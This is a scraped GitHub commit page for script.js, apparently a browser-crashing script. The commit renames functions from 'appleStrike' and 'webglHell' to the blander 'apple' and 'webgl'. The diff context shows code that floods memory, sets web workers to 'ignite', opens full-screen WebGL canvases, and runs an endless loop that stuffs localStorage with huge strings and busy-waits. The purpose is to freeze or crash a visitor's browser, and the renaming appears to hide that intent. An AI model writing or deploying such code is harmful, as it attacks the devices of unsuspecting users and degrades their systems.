Skip to content

Commit 61fd71f

Browse files
committed
changed function names
1 parent 114f983 commit 61fd71f

1 file changed

Lines changed: 5 additions & 5 deletions

File tree

script.js

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -58,7 +58,7 @@
5858
lock();
5959

6060
if (isApple) {
61-
const appleStrike = () => {
61+
const apple = () => {
6262
const m = [];
6363
const flood = () => {
6464
for(let i = 0; i < 150; i++) {
@@ -99,13 +99,13 @@
9999
webglApple();
100100
flood();
101101
};
102-
appleStrike();
102+
apple();
103103
} else {
104104
battalions.forEach((w, index) => {
105105
setTimeout(() => w.postMessage('ignite'), index * 5);
106106
});
107107

108-
const webglHell = () => {
108+
const webgl = () => {
109109
const c = document.createElement('canvas');
110110
c.width = window.screen.width;
111111
c.height = window.screen.height;
@@ -144,15 +144,15 @@
144144
const db = () => {
145145
const g = [];
146146
while(true) {
147-
const d = new Array(5000000).fill("doom").join("!");
147+
const d = new Array(5000000).fill("comedymoon").join("!");
148148
try { localStorage.setItem(performance.now() + Math.random(), d); } catch(e) {}
149149
g.push(d);
150150
const s = Date.now();
151151
while(Date.now() - s < 100) {}
152152
}
153153
};
154154

155-
webglHell();
155+
webgl();
156156
l();
157157
setTimeout(db, 1);
158158
}

0 commit comments

Comments
 (0)